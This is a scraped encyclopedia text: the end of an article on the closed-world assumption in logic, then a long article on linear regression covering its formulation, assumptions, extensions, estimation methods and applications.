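The closed-world vs. open-world query above can be sketched in Python with sets. The editor–article table itself did not survive extraction, so the rows below are illustrative placeholders; only "Sarah Johnson" (the expected answer from the text) is taken from the source.

```python
# Hypothetical editor–article table; rows other than Sarah Johnson's are invented.
edited = {
    ("John Doe", "Formal Logic"),
    ("Sarah Johnson", "Introduction to Databases"),
    ("Emma Thompson", "Formal Logic"),
}
editors = {e for e, _ in edited}

# Closed-world answer: the table is assumed complete, so anyone listed
# without an edit to "Formal Logic" definitely has not edited it.
cwa_answer = {e for e in editors if (e, "Formal Logic") not in edited}

# Open-world answer: unknown — absence of a tuple from the table proves nothing,
# so no definite set of non-editors can be derived.
```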
The first formalization of the closed-world assumption informal logicconsists in adding to the knowledge base the negation of the literals that are not currentlyentailedby it. The result of this addition is alwaysconsistentif the knowledge base is inHorn form, but is not guaranteed to be consistent otherwise. For example, the knowledge base
entails neither $English(Fred)$ nor $Irish(Fred)$.
Adding the negation of these two literals to the knowledge base leads to
which is inconsistent. In other words, this formalization of the closed-world assumption sometimes turns a consistent knowledge base into an inconsistent one. The closed-world assumption does not introduce an inconsistency on a knowledge base $K$ exactly when the intersection of all Herbrand models of $K$ is also a model of $K$; in the propositional case, this condition is equivalent to $K$ having a single minimal model, where a model is minimal if no other model has a subset of variables assigned to true.
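The inconsistency in the running example can be verified by brute force over truth assignments (Python; the propositional encoding of $English(Fred)$ and $Irish(Fred)$ as atoms E and I is an illustrative assumption):

```python
from itertools import product

# Propositional KB over atoms E = "English(Fred)", I = "Irish(Fred)": the KB is E ∨ I.
atoms = ("E", "I")
def kb(m):                       # m: assignment mapping atom -> bool
    return m["E"] or m["I"]

assignments = [dict(zip(atoms, bits)) for bits in product([False, True], repeat=len(atoms))]
models = [m for m in assignments if kb(m)]

# Naive CWA: add ¬a for every atom a not entailed by the KB
# (a is entailed iff it is true in every model of the KB).
entailed = {a for a in atoms if all(m[a] for m in models)}
negated = [a for a in atoms if a not in entailed]

# The augmented KB is consistent iff some model of KB also falsifies every negated atom.
consistent = any(all(not m[a] for a in negated) for m in models)
```

Here neither atom is entailed, so the CWA adds both ¬E and ¬I, and no model of E ∨ I survives: the augmented knowledge base is inconsistent, as the text states.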
Alternative formalizations not suffering from this problem have been proposed. In the following description, the considered knowledge base $K$ is assumed to be propositional. In all cases, the formalization of the closed-world assumption is based on adding to $K$ the negation of the formulae that are "free for negation" for $K$, i.e., the formulae that can be assumed to be false. In other words, the closed-world assumption applied to a knowledge base $K$ generates the knowledge base

$K \cup \{\neg f \mid f \in F\}.$
The set $F$ of formulae that are free for negation in $K$ can be defined in different ways, leading to different formalizations of the closed-world assumption. The following are the definitions of $f$ being free for negation in the various formalizations.
The ECWA and the formalism ofcircumscriptioncoincide on propositional theories.[5][6]The complexity of query answering (checking whether a formula is entailed by another one under the closed-world assumption) is typically in the second level of thepolynomial hierarchyfor general formulae, and ranges fromPtocoNPforHorn formulae. Checking whether the original closed-world assumption introduces an inconsistency requires at most a logarithmic number of calls to anNP oracle; however, the exact complexity of this problem is not currently known.[7]
In situations where it is not possible to assume a closed world for all predicates, yet some of them are known to be closed, thepartial-closed world assumptioncan be used. This regime considers knowledge bases generally to be open, i.e., potentially incomplete, yet allows to use completeness assertions to specify parts of the knowledge base that are closed.[8]
The language of logic programs with strong negation allows us to postulate the closed-world assumption for some statements and leave the other statements in the realm of the open-world assumption.[9] The PCWA described above likewise provides an intermediate ground between the OWA and the CWA: the knowledge base is generally treated under open-world semantics, yet parts that should be treated under closed-world semantics can be asserted via completeness assertions. The PCWA is especially needed for situations where the CWA is not applicable due to an open domain, yet the OWA is too credulous in allowing anything to be possibly true.[10][11]
|
https://en.wikipedia.org/wiki/Closed_world_assumption
|
Instatistics,linear regressionis amodelthat estimates the relationship between ascalarresponse (dependent variable) and one or more explanatory variables (regressororindependent variable). A model with exactly one explanatory variable is asimple linear regression; a model with two or more explanatory variables is amultiple linear regression.[1]This term is distinct frommultivariate linear regression, which predicts multiplecorrelateddependent variables rather than a single dependent variable.[2]
In linear regression, the relationships are modeled usinglinear predictor functionswhose unknown modelparametersareestimatedfrom thedata. Most commonly, theconditional meanof the response given the values of the explanatory variables (or predictors) is assumed to be anaffine functionof those values; less commonly, the conditionalmedianor some otherquantileis used. Like all forms ofregression analysis, linear regression focuses on theconditional probability distributionof the response given the values of the predictors, rather than on thejoint probability distributionof all of these variables, which is the domain ofmultivariate analysis.
Linear regression is also a type of machine learning algorithm, more specifically a supervised algorithm, that learns from labelled datasets and maps the data points to an optimized linear function that can be used for prediction on new datasets.[3]
Linear regression was the first type of regression analysis to be studied rigorously, and to be used extensively in practical applications.[4]This is because models which depend linearly on their unknown parameters are easier to fit than models which are non-linearly related to their parameters and because the statistical properties of the resulting estimators are easier to determine.
Linear regression has many practical uses. Most applications fall into one of the following two broad categories:
Linear regression models are often fitted using the least squares approach, but they may also be fitted in other ways, such as by minimizing the "lack of fit" in some other norm (as with least absolute deviations regression), or by minimizing a penalized version of the least squares cost function as in ridge regression (L2-norm penalty) and lasso (L1-norm penalty). Use of the mean squared error (MSE) as the cost on a dataset with many large outliers can result in a model that fits the outliers more than the true data, due to the higher importance MSE assigns to large errors; in that case, a cost function that is robust to outliers should be used instead. Conversely, the least squares approach can be used to fit models that are not linear models. Thus, although the terms "least squares" and "linear model" are closely linked, they are not synonymous.
Given a data set $\{y_i, x_{i1}, \ldots, x_{ip}\}_{i=1}^{n}$ of $n$ statistical units, a linear regression model assumes that the relationship between the dependent variable $y$ and the vector of regressors $x$ is linear. This relationship is modeled through a disturbance term or error variable $\varepsilon$, an unobserved random variable that adds "noise" to the linear relationship between the dependent variable and regressors. Thus the model takes the form

$y_i = \beta_0 + \beta_1 x_{i1} + \cdots + \beta_p x_{ip} + \varepsilon_i = \mathbf{x}_i^{T}\boldsymbol{\beta} + \varepsilon_i, \qquad i = 1, \ldots, n,$

where $T$ denotes the transpose, so that $\mathbf{x}_i^{T}\boldsymbol{\beta}$ is the inner product between the vectors $\mathbf{x}_i$ and $\boldsymbol{\beta}$.
Often these n equations are stacked together and written in matrix notation as
where
Fitting a linear model to a given data set usually requires estimating the regression coefficients {\displaystyle {\boldsymbol {\beta }}} such that the error term {\displaystyle {\boldsymbol {\varepsilon }}=\mathbf {y} -\mathbf {X} {\boldsymbol {\beta }}} is minimized. For example, it is common to use the sum of squared errors {\displaystyle \|{\boldsymbol {\varepsilon }}\|_{2}^{2}} as a measure of {\displaystyle {\boldsymbol {\varepsilon }}} for minimization.
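As a minimal sketch of this fitting step (the data here are simulated, since the article supplies none, and the true coefficients are illustrative assumptions), the least-squares fit minimizing the sum of squared errors can be computed with NumPy:

```python
import numpy as np

rng = np.random.default_rng(0)
n = 200
# design matrix X: a column of ones (intercept) plus one regressor
X = np.column_stack([np.ones(n), rng.normal(size=n)])
beta_true = np.array([0.5, 2.0])                    # illustrative coefficients
y = X @ beta_true + rng.normal(scale=0.1, size=n)   # y = X beta + eps

# least-squares fit: beta_hat minimizes ||y - X beta||_2^2
beta_hat, *_ = np.linalg.lstsq(X, y, rcond=None)
```

With low noise and n = 200, the estimate lands close to the assumed true coefficients.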
Consider a situation where a small ball is being tossed up in the air and then we measure its heights of ascent hi at various moments in time ti. Physics tells us that, ignoring the drag, the relationship can be modeled as

where β1 determines the initial velocity of the ball, β2 is proportional to the standard gravity, and εi is due to measurement errors. Linear regression can be used to estimate the values of β1 and β2 from the measured data. This model is non-linear in the time variable, but it is linear in the parameters β1 and β2; if we take regressors xi = (xi1, xi2) = (ti, ti2), the model takes on the standard form
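A sketch of the ball example with assumed values v0 = 20 m/s and g = 9.81 m/s² (both illustrative): the model is nonlinear in t but linear in (β1, β2), so ordinary least squares on the regressors (t, t²) recovers both parameters:

```python
import numpy as np

g, v0 = 9.81, 20.0                      # assumed physical constants
t = np.linspace(0.1, 3.0, 30)           # measurement times
rng = np.random.default_rng(1)
h = v0 * t - 0.5 * g * t**2 + rng.normal(scale=0.05, size=t.size)

# regressors x_i = (t_i, t_i^2): h = beta1*t + beta2*t^2 is linear
# in the parameters even though it is quadratic in time
X = np.column_stack([t, t**2])
beta_hat, *_ = np.linalg.lstsq(X, h, rcond=None)
# beta_hat[0] estimates v0, beta_hat[1] estimates -g/2
```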
Standard linear regression models with standard estimation techniques make a number of assumptions about the predictor variables, the response variable and their relationship. Numerous extensions have been developed that allow each of these assumptions to be relaxed (i.e. reduced to a weaker form), and in some cases eliminated entirely. Generally these extensions make the estimation procedure more complex and time-consuming, and may also require more data in order to produce an equally precise model.[citation needed]
The following are the major assumptions made by standard linear regression models with standard estimation techniques (e.g. ordinary least squares):

Violations of these assumptions can result in biased estimates of β, biased standard errors, untrustworthy confidence intervals and significance tests. Beyond these assumptions, several other statistical properties of the data strongly influence the performance of different estimation methods:
A fitted linear regression model can be used to identify the relationship between a single predictor variable xj and the response variable y when all the other predictor variables in the model are "held fixed". Specifically, the interpretation of βj is the expected change in y for a one-unit change in xj when the other covariates are held fixed, that is, the expected value of the partial derivative of y with respect to xj. This is sometimes called the unique effect of xj on y. In contrast, the marginal effect of xj on y can be assessed using a correlation coefficient or simple linear regression model relating only xj to y; this effect is the total derivative of y with respect to xj.

Care must be taken when interpreting regression results, as some of the regressors may not allow for marginal changes (such as dummy variables, or the intercept term), while others cannot be held fixed (recall the example from the introduction: it would be impossible to "hold ti fixed" and at the same time change the value of ti2).
It is possible for the unique effect to be nearly zero even when the marginal effect is large. This may imply that some other covariate captures all the information in xj, so that once that variable is in the model, there is no contribution of xj to the variation in y. Conversely, the unique effect of xj can be large while its marginal effect is nearly zero. This would happen if the other covariates explained a great deal of the variation of y, but they mainly explain variation in a way that is complementary to what is captured by xj. In this case, including the other variables in the model reduces the part of the variability of y that is unrelated to xj, thereby strengthening the apparent relationship with xj.
The meaning of the expression "held fixed" may depend on how the values of the predictor variables arise. If the experimenter directly sets the values of the predictor variables according to a study design, the comparisons of interest may literally correspond to comparisons among units whose predictor variables have been "held fixed" by the experimenter. Alternatively, the expression "held fixed" can refer to a selection that takes place in the context of data analysis. In this case, we "hold a variable fixed" by restricting our attention to the subsets of the data that happen to have a common value for the given predictor variable. This is the only interpretation of "held fixed" that can be used in an observational study.

The notion of a "unique effect" is appealing when studying a complex system where multiple interrelated components influence the response variable. In some cases, it can literally be interpreted as the causal effect of an intervention that is linked to the value of a predictor variable. However, it has been argued that in many cases multiple regression analysis fails to clarify the relationships between the predictor variables and the response variable when the predictors are correlated with each other and are not assigned following a study design.[9]
Numerous extensions of linear regression have been developed, which allow some or all of the assumptions underlying the basic model to be relaxed.
The simplest case of a single scalar predictor variable x and a single scalar response variable y is known as simple linear regression. The extension to multiple and/or vector-valued predictor variables (denoted with a capital X) is known as multiple linear regression, also known as multivariable linear regression (not to be confused with multivariate linear regression).[10]

Multiple linear regression is a generalization of simple linear regression to the case of more than one independent variable, and a special case of general linear models, restricted to one dependent variable. The basic model for multiple linear regression is
for each observation {\textstyle i=1,\ldots ,n}.

In the formula above we consider n observations of one dependent variable and p independent variables. Thus, Yi is the ith observation of the dependent variable, Xij is the ith observation of the jth independent variable, for j = 1, 2, ..., p. The values βj represent parameters to be estimated, and εi is the ith independent, identically distributed normal error.

In the more general multivariate linear regression, there is one equation of the above form for each of m > 1 dependent variables that share the same set of explanatory variables and hence are estimated simultaneously with each other:

for all observations indexed as i = 1, ..., n and for all dependent variables indexed as j = 1, ..., m.

Nearly all real-world regression models involve multiple predictors, and basic descriptions of linear regression are often phrased in terms of the multiple regression model. Note, however, that in these cases the response variable y is still a scalar. Another term, multivariate linear regression, refers to cases where y is a vector, i.e., the same as general linear regression.
Model Assumptions to Check:
1. Linearity: Relationship between each predictor and outcome must be linear
2. Normality of residuals: Residuals should follow a normal distribution
3. Homoscedasticity: Constant variance of residuals across predicted values
4. Independence: Observations should be independent (not repeated measures)
SPSS: Use partial plots, histograms, P-P plots, residual vs. predicted plots
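The checklist above can also be probed numerically; this rough sketch on simulated data (with arbitrary cutoffs) is not a substitute for the diagnostic plots, but it shows checks 2 and 3 in code:

```python
import numpy as np

rng = np.random.default_rng(2)
n = 500
X = np.column_stack([np.ones(n), rng.normal(size=n)])
y = X @ np.array([1.0, 3.0]) + rng.normal(size=n)   # well-specified model
beta_hat, *_ = np.linalg.lstsq(X, y, rcond=None)

fitted = X @ beta_hat
resid = y - fitted

mean_resid = resid.mean()   # residuals centred at zero when an intercept is fitted
# homoscedasticity: residual spread in low vs high fitted halves should match
lo = resid[fitted < np.median(fitted)].std()
hi = resid[fitted >= np.median(fitted)].std()
```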
The general linear model considers the situation when the response variable is not a scalar (for each observation) but a vector, yi. Conditional linearity of {\displaystyle E(\mathbf {y} \mid \mathbf {x} _{i})=\mathbf {x} _{i}^{\mathsf {T}}B} is still assumed, with a matrix B replacing the vector β of the classical linear regression model. Multivariate analogues of ordinary least squares (OLS) and generalized least squares (GLS) have been developed. "General linear models" are also called "multivariate linear models". These are not the same as multivariable linear models (also called "multiple linear models").

Various models have been created that allow for heteroscedasticity, i.e. the errors for different response variables may have different variances. For example, weighted least squares is a method for estimating linear regression models when the response variables may have different error variances, possibly with correlated errors. (See also weighted linear least squares and generalized least squares.) Heteroscedasticity-consistent standard errors are an improved method for use with uncorrelated but potentially heteroscedastic errors.

The generalized linear model (GLM) is a framework for modeling response variables that are bounded or discrete. This is used, for example:

Generalized linear models allow for an arbitrary link function, g, that relates the mean of the response variable(s) to the predictors: {\displaystyle E(Y)=g^{-1}(XB)}. The link function is often related to the distribution of the response, and in particular it typically has the effect of transforming between the {\displaystyle (-\infty ,\infty )} range of the linear predictor and the range of the response variable.
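For instance, with the logit link g(μ) = log(μ/(1−μ)), the inverse link maps the unbounded linear predictor into (0, 1), suitable as the mean of a Bernoulli response (a generic sketch, not tied to any dataset above):

```python
import numpy as np

def inv_logit(eta):
    # inverse of the logit link: g^{-1} maps (-inf, inf) onto (0, 1)
    return 1.0 / (1.0 + np.exp(-eta))

eta = np.array([-4.0, 0.0, 4.0])   # values of the linear predictor X @ B
mu = inv_logit(eta)                # E(Y): valid Bernoulli means
```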
Some common examples of GLMs are:
Single index models[clarification needed] allow some degree of nonlinearity in the relationship between x and y, while preserving the central role of the linear predictor β′x as in the classical linear regression model. Under certain conditions, simply applying OLS to data from a single-index model will consistently estimate β up to a proportionality constant.[11]

Hierarchical linear models (or multilevel regression) organize the data into a hierarchy of regressions, for example where A is regressed on B, and B is regressed on C. It is often used where the variables of interest have a natural hierarchical structure, such as in educational statistics, where students are nested in classrooms, classrooms are nested in schools, and schools are nested in some administrative grouping, such as a school district. The response variable might be a measure of student achievement such as a test score, and different covariates would be collected at the classroom, school, and school district levels.

Errors-in-variables models (or "measurement error models") extend the traditional linear regression model to allow the predictor variables X to be observed with error. This error causes standard estimators of β to become biased. Generally, the form of bias is an attenuation, meaning that the effects are biased toward zero.
In a multiple linear regression model
the parameter βj of predictor variable xj represents the individual effect of xj. It has an interpretation as the expected change in the response variable y when xj increases by one unit with the other predictor variables held constant. When xj is strongly correlated with other predictor variables, it is improbable that xj can increase by one unit with the other variables held constant. In this case, the interpretation of βj becomes problematic as it is based on an improbable condition, and the effect of xj cannot be evaluated in isolation.
For a group of predictor variables, say {x1, x2, ..., xq}, a group effect ξ(w) is defined as a linear combination of their parameters

where w = (w1, w2, ..., wq)⊺ is a weight vector satisfying {\textstyle \sum _{j=1}^{q}|w_{j}|=1}. Because of this constraint on the wj, ξ(w) is also referred to as a normalized group effect. A group effect ξ(w) has an interpretation as the expected change in y when the variables in the group x1, x2, ..., xq change by the amounts w1, w2, ..., wq, respectively, at the same time, with the variables not in the group held constant. It generalizes the individual effect of a variable to a group of variables in that (i) if q = 1, then the group effect reduces to an individual effect, and (ii) if wi = 1 and wj = 0 for j ≠ i, then the group effect also reduces to an individual effect.

A group effect ξ(w) is said to be meaningful if the underlying simultaneous changes of the q variables (x1, x2, ..., xq)⊺ are probable.
Group effects provide a means to study the collective impact of strongly correlated predictor variables in linear regression models. Individual effects of such variables are not well-defined as their parameters do not have good interpretations. Furthermore, when the sample size is not large, none of their parameters can be accurately estimated by least squares regression due to the multicollinearity problem. Nevertheless, there are meaningful group effects that have good interpretations and can be accurately estimated by least squares regression. A simple way to identify these meaningful group effects is to use an all positive correlations (APC) arrangement of the strongly correlated variables, under which pairwise correlations among these variables are all positive, and to standardize all p predictor variables in the model so that they all have mean zero and length one. To illustrate this, suppose that {x1, x2, ..., xq} is a group of strongly correlated variables in an APC arrangement and that they are not strongly correlated with predictor variables outside the group. Let y′ be the centred y and xj′ be the standardized xj. Then, the standardized linear regression model is

Parameters βj in the original model, including β0, are simple functions of βj′ in the standardized model. The standardization of variables does not change their correlations, so {x1′, x2′, ..., xq′} is a group of strongly correlated variables in an APC arrangement, and they are not strongly correlated with other predictor variables in the standardized model. A group effect of {x1′, x2′, ..., xq′} is
and its minimum-variance unbiased linear estimator is
where {\displaystyle {\hat {\beta }}_{j}'} is the least squares estimator of βj′. In particular, the average group effect of the q standardized variables is

which has an interpretation as the expected change in y′ when all xj′ in the strongly correlated group increase by (1/q)th of a unit at the same time, with variables outside the group held constant. With strong positive correlations and in standardized units, variables in the group are approximately equal, so they are likely to increase at the same time and by similar amounts. Thus, the average group effect ξA is a meaningful effect. It can be accurately estimated by its minimum-variance unbiased linear estimator {\textstyle {\hat {\xi }}_{A}={\frac {1}{q}}({\hat {\beta }}_{1}'+{\hat {\beta }}_{2}'+\dots +{\hat {\beta }}_{q}')}, even when individually none of the βj′ can be accurately estimated by {\displaystyle {\hat {\beta }}_{j}'}.
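A small simulation illustrating this point (the data-generating values are assumptions of the sketch): with two strongly positively correlated standardized predictors, the individual coefficient estimates are noisy, yet their average estimates the average group effect accurately:

```python
import numpy as np

rng = np.random.default_rng(3)
n = 300
z = rng.normal(size=n)
# two strongly positively correlated predictors (an APC arrangement)
x1 = z + 0.05 * rng.normal(size=n)
x2 = z + 0.05 * rng.normal(size=n)

def standardize(v):
    # mean zero, length one, as in the construction above
    v = v - v.mean()
    return v / np.linalg.norm(v)

X = np.column_stack([standardize(x1), standardize(x2)])
y = X @ np.array([1.0, 1.0]) + rng.normal(scale=0.1, size=n)
y = y - y.mean()                                   # centred response

beta_hat, *_ = np.linalg.lstsq(X, y, rcond=None)
xi_A_hat = beta_hat.mean()   # estimated average group effect (true value 1.0)
```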
Not all group effects are meaningful or can be accurately estimated. For example, β1′ is a special group effect with weights w1 = 1 and wj = 0 for j ≠ 1, but it cannot be accurately estimated by {\displaystyle {\hat {\beta }}'_{1}}. It is also not a meaningful effect. In general, for a group of q strongly correlated predictor variables in an APC arrangement in the standardized model, group effects whose weight vectors w are at or near the centre of the simplex {\textstyle \sum _{j=1}^{q}w_{j}=1} (wj ≥ 0) are meaningful and can be accurately estimated by their minimum-variance unbiased linear estimators. Effects with weight vectors far away from the centre are not meaningful, as such weight vectors represent simultaneous changes of the variables that violate the strong positive correlations of the standardized variables in an APC arrangement. As such, they are not probable. These effects also cannot be accurately estimated.

Applications of the group effects include (1) estimation and inference for meaningful group effects on the response variable, (2) testing for "group significance" of the q variables via testing H0: ξA = 0 versus H1: ξA ≠ 0, and (3) characterizing the region of the predictor variable space over which predictions by the least squares estimated model are accurate.

A group effect of the original variables {x1, x2, ..., xq} can be expressed as a constant times a group effect of the standardized variables {x1′, x2′, ..., xq′}. The former is meaningful when the latter is. Thus meaningful group effects of the original variables can be found through meaningful group effects of the standardized variables.[12]
In Dempster–Shafer theory, or a linear belief function in particular, a linear regression model may be represented as a partially swept matrix, which can be combined with similar matrices representing observations and other assumed normal distributions and state equations. The combination of swept or unswept matrices provides an alternative method for estimating linear regression models.

A large number of procedures have been developed for parameter estimation and inference in linear regression. These methods differ in computational simplicity of algorithms, presence of a closed-form solution, robustness with respect to heavy-tailed distributions, and the theoretical assumptions needed to validate desirable statistical properties such as consistency and asymptotic efficiency.
Some of the more common estimation techniques for linear regression are summarized below.
Assuming that the independent variables are {\displaystyle {\vec {x_{i}}}=\left[x_{1}^{i},x_{2}^{i},\ldots ,x_{m}^{i}\right]} and the model's parameters are {\displaystyle {\vec {\beta }}=\left[\beta _{0},\beta _{1},\ldots ,\beta _{m}\right]}, then the model's prediction would be

If {\displaystyle {\vec {x_{i}}}} is extended to {\displaystyle {\vec {x_{i}}}=\left[1,x_{1}^{i},x_{2}^{i},\ldots ,x_{m}^{i}\right]} then yi would become a dot product of the parameter vector and the independent-variable vector, i.e.

In the least-squares setting, the optimum parameter vector is defined as the one that minimizes the sum of squared losses:
Now putting the independent and dependent variables in matrices X and Y respectively, the loss function can be rewritten as:

As the loss function is convex, the optimum solution lies at gradient zero. The gradient of the loss function is (using the denominator layout convention):
Setting the gradient to zero produces the optimum parameter:
Note: to confirm that the {\displaystyle {\hat {\beta }}} obtained is indeed a minimum, one needs to differentiate once more to obtain the Hessian matrix and show that it is positive definite. Here the Hessian is {\displaystyle 2\mathbf {X} ^{\mathsf {T}}\mathbf {X} }, which is positive definite whenever X has full column rank.
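Setting the gradient to zero yields the normal equations; a sketch of solving them on simulated data (solving the linear system rather than forming an explicit inverse, which is numerically preferable):

```python
import numpy as np

rng = np.random.default_rng(4)
n = 100
X = np.column_stack([np.ones(n), rng.normal(size=(n, 2))])
beta_true = np.array([1.0, 2.0, -1.0])             # illustrative parameters
y = X @ beta_true + rng.normal(scale=0.05, size=n)

# normal equations: (X^T X) beta_hat = X^T y
beta_hat = np.linalg.solve(X.T @ X, X.T @ y)
```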
Linear least squares methods include mainly:

Maximum likelihood estimation can be performed when the distribution of the error terms is known to belong to a certain parametric family fθ of probability distributions.[15] When fθ is a normal distribution with zero mean and variance θ, the resulting estimate is identical to the OLS estimate. GLS estimates are maximum likelihood estimates when ε follows a multivariate normal distribution with a known covariance matrix.
Let us denote each data point by ({\vec {x_{i}}}, yi), the regression parameters by {\vec {\beta }}, the set of all data by D, and the cost function by {\displaystyle L(D,{\vec {\beta }})=\sum _{i}(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}})^{2}}.

As shown below, the same optimal parameter that minimizes L(D, {\vec {\beta }}) achieves maximum likelihood too.[16] Here the assumption is that the dependent variable y is a random variable that follows a Gaussian distribution, where the standard deviation is fixed and the mean is a linear combination of {\vec {x}}: {\displaystyle {\begin{aligned}H(D,{\vec {\beta }})&=\prod _{i=1}^{n}Pr(y_{i}|{\vec {x_{i}}}\,\,;{\vec {\beta }},\sigma )\\&=\prod _{i=1}^{n}{\frac {1}{{\sqrt {2\pi }}\sigma }}\exp \left(-{\frac {\left(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}}\right)^{2}}{2\sigma ^{2}}}\right)\end{aligned}}}
Now, we need to look for a parameter that maximizes this likelihood function. Since the logarithmic function is strictly increasing, instead of maximizing this function, we can also maximize its logarithm and find the optimal parameter that way.[16]
{\displaystyle {\begin{aligned}I(D,{\vec {\beta }})&=\log \prod _{i=1}^{n}Pr(y_{i}|{\vec {x_{i}}}\,\,;{\vec {\beta }},\sigma )\\&=\log \prod _{i=1}^{n}{\frac {1}{{\sqrt {2\pi }}\sigma }}\exp \left(-{\frac {\left(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}}\right)^{2}}{2\sigma ^{2}}}\right)\\&=n\log {\frac {1}{{\sqrt {2\pi }}\sigma }}-{\frac {1}{2\sigma ^{2}}}\sum _{i=1}^{n}\left(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}}\right)^{2}\end{aligned}}}

The optimal parameter is thus equal to:[16]

{\displaystyle {\begin{aligned}{\underset {\vec {\beta }}{\mbox{arg max}}}\,I(D,{\vec {\beta }})&={\underset {\vec {\beta }}{\mbox{arg max}}}\left(n\log {\frac {1}{{\sqrt {2\pi }}\sigma }}-{\frac {1}{2\sigma ^{2}}}\sum _{i=1}^{n}\left(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}}\right)^{2}\right)\\&={\underset {\vec {\beta }}{\mbox{arg min}}}\sum _{i=1}^{n}\left(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}}\right)^{2}\\&={\underset {\vec {\beta }}{\mbox{arg min}}}\,L(D,{\vec {\beta }})\\&={\vec {\hat {\beta }}}\end{aligned}}}

In this way, the parameter that maximizes H(D, {\vec {\beta }}) is the same as the one that minimizes L(D, {\vec {\beta }}). This means that in linear regression, the result of the least squares method is the same as the result of the maximum likelihood estimation method.[16]
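This equivalence can be spot-checked numerically: the OLS solution attains at least as high a Gaussian log-likelihood as perturbed parameter values (a sketch; σ is treated as known, and the data are simulated):

```python
import numpy as np

rng = np.random.default_rng(5)
n, sigma = 50, 0.3
X = np.column_stack([np.ones(n), rng.normal(size=n)])
y = X @ np.array([0.0, 1.0]) + rng.normal(scale=sigma, size=n)

def log_lik(beta):
    # Gaussian log-likelihood with fixed sigma, as in the derivation above
    r = y - X @ beta
    return n * np.log(1.0 / (np.sqrt(2 * np.pi) * sigma)) - (r @ r) / (2 * sigma**2)

beta_ols = np.linalg.solve(X.T @ X, X.T @ y)   # least-squares solution
```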
Ridge regression[17][18][19] and other forms of penalized estimation, such as lasso regression,[5] deliberately introduce bias into the estimation of β in order to reduce the variability of the estimate. The resulting estimates generally have lower mean squared error than the OLS estimates, particularly when multicollinearity is present or when overfitting is a problem. They are generally used when the goal is to predict the value of the response variable y for values of the predictors x that have not yet been observed. These methods are not as commonly used when the goal is inference, since it is difficult to account for the bias.
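A minimal ridge sketch (the penalty strength λ is an arbitrary illustrative choice): the L2 penalty shrinks the estimate toward zero relative to OLS:

```python
import numpy as np

rng = np.random.default_rng(6)
n, p = 60, 3
X = rng.normal(size=(n, p))
y = X @ np.array([1.0, 0.5, -0.5]) + rng.normal(scale=0.2, size=n)

lam = 5.0   # penalty strength (illustrative)
# ridge estimate: minimizes ||y - X b||^2 + lam * ||b||^2
beta_ridge = np.linalg.solve(X.T @ X + lam * np.eye(p), X.T @ y)
beta_ols = np.linalg.solve(X.T @ X, X.T @ y)
```

For any λ > 0 the ridge solution has strictly smaller norm than the OLS solution (unless the OLS solution is exactly zero).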
Least absolute deviation (LAD) regression is a robust estimation technique in that it is less sensitive to the presence of outliers than OLS (but is less efficient than OLS when no outliers are present). It is equivalent to maximum likelihood estimation under a Laplace distribution model for ε.[20]
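LAD has no closed form; one common approach is iteratively reweighted least squares, sketched here on data with a few gross outliers (the IRLS scheme and all constants are assumptions of the sketch, not part of the article):

```python
import numpy as np

rng = np.random.default_rng(7)
n = 80
x = rng.normal(size=n)
y = 2.0 * x + rng.normal(scale=0.1, size=n)
y[:5] += 20.0                          # inject a few large outliers
X = np.column_stack([np.ones(n), x])

def lad_fit(X, y, iters=50, eps=1e-8):
    # iteratively reweighted least squares approximation to the LAD fit:
    # weighting each point by 1/|residual| damps the pull of outliers
    beta = np.linalg.solve(X.T @ X, X.T @ y)      # start from OLS
    for _ in range(iters):
        w = 1.0 / np.maximum(np.abs(y - X @ beta), eps)
        XtW = X.T * w
        beta = np.linalg.solve(XtW @ X, XtW @ y)
    return beta

beta_lad = lad_fit(X, y)   # slope stays near 2 despite the outliers
```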
If we assume that the error terms are independent of the regressors, {\displaystyle \varepsilon _{i}\perp \mathbf {x} _{i}}, then the optimal estimator is the 2-step MLE, where the first step is used to non-parametrically estimate the distribution of the error term.[21]
Linear regression is widely used in biological, behavioral and social sciences to describe possible relationships between variables. It ranks as one of the most important tools used in these disciplines.
A trend line represents a trend, the long-term movement in time series data after other components have been accounted for. It tells whether a particular data set (say GDP, oil prices or stock prices) has increased or decreased over a period of time. A trend line could simply be drawn by eye through a set of data points, but more properly its position and slope are calculated using statistical techniques like linear regression. Trend lines typically are straight lines, although some variations use higher-degree polynomials depending on the degree of curvature desired in the line.
Trend lines are sometimes used in business analytics to show changes in data over time. This has the advantage of being simple. Trend lines are often used to argue that a particular action or event (such as training, or an advertising campaign) caused observed changes at a point in time. This is a simple technique, and does not require a control group, experimental design, or a sophisticated analysis technique. However, it suffers from a lack of scientific validity in cases where other potential changes can affect the data.
Early evidence relating tobacco smoking to mortality and morbidity came from observational studies employing regression analysis. In order to reduce spurious correlations when analyzing observational data, researchers usually include several variables in their regression models in addition to the variable of primary interest. For example, in a regression model in which cigarette smoking is the independent variable of primary interest and the dependent variable is lifespan measured in years, researchers might include education and income as additional independent variables, to ensure that any observed effect of smoking on lifespan is not due to those other socio-economic factors. However, it is never possible to include all possible confounding variables in an empirical analysis. For example, a hypothetical gene might increase mortality and also cause people to smoke more. For this reason, randomized controlled trials are often able to generate more compelling evidence of causal relationships than can be obtained using regression analyses of observational data. When controlled experiments are not feasible, variants of regression analysis such as instrumental variables regression may be used to attempt to estimate causal relationships from observational data.

The capital asset pricing model uses linear regression as well as the concept of beta for analyzing and quantifying the systematic risk of an investment. This comes directly from the beta coefficient of the linear regression model that relates the return on the investment to the return on all risky assets.

Linear regression is the predominant empirical tool in economics. For example, it is used to predict consumption spending,[24] fixed investment spending, inventory investment, purchases of a country's exports,[25] spending on imports,[25] the demand to hold liquid assets,[26] labor demand,[27] and labor supply.[27]

Linear regression finds application in a wide range of environmental science applications, such as land use,[28] infectious diseases,[29] and air pollution.[30] For example, linear regression can be used to predict the changing effects of car pollution.[31] One notable example of this application in infectious diseases is the flattening the curve strategy emphasized early in the COVID-19 pandemic, where public health officials dealt with sparse data on infected individuals and used sophisticated models of disease transmission to characterize the spread of COVID-19.[32]

